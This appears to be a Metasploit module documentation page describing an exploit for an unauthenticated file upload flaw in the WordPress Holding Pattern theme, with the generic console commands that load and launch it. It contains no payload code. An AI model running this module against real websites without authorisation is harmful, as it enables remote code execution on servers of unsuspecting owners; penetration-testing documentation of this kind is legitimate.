Description

This module exploits a file upload vulnerability in all versions of the Holding Pattern theme found in the upload_file.php script which contains no session or file validation. It allows unauthenticated users to upload files of any type and subsequently execute PHP scripts in the context of the web server.

Module Options

To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

msf > use exploit/unix/webapp/wp_holding_pattern_file_upload
msf exploit(wp_holding_pattern_file_upload) > show targets
    ...targets...
msf exploit(wp_holding_pattern_file_upload) > set TARGET < target-id >
msf exploit(wp_holding_pattern_file_upload) > show options
    ...show and set options...
msf exploit(wp_holding_pattern_file_upload) > exploit

Time is precious, so I don’t want to do something manually that I can automate. Leveraging the Metasploit Framework when automating any task keeps us from having to re-create the wheel as we can use the existing libraries and focus our efforts where it matters.
